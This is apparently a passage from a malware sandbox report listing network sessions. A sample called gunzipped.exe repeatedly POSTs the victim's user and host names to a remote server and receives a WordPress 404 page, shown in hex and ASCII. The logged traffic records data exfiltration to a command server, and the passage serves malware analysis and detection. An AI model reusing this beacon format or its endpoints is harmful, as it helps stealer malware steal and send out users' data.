6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:08.247153044 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:08.247193098 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:08.247230053 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:08.247416019 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:08.247453928 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:08.247489929 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:08.247534990 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:08.247575045 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:08.247611046 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49723	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:08.603347063 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:08.806757927 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:09.761991978 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:08 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:09.762037039 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:09.762073994 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:09.762110949 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:09.762146950 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:09.762183905 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:09.762222052 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:09.762259007 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:09.762295961 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:09.762332916 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49724	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:10.136681080 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:10.340393066 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:11.345689058 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:10 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 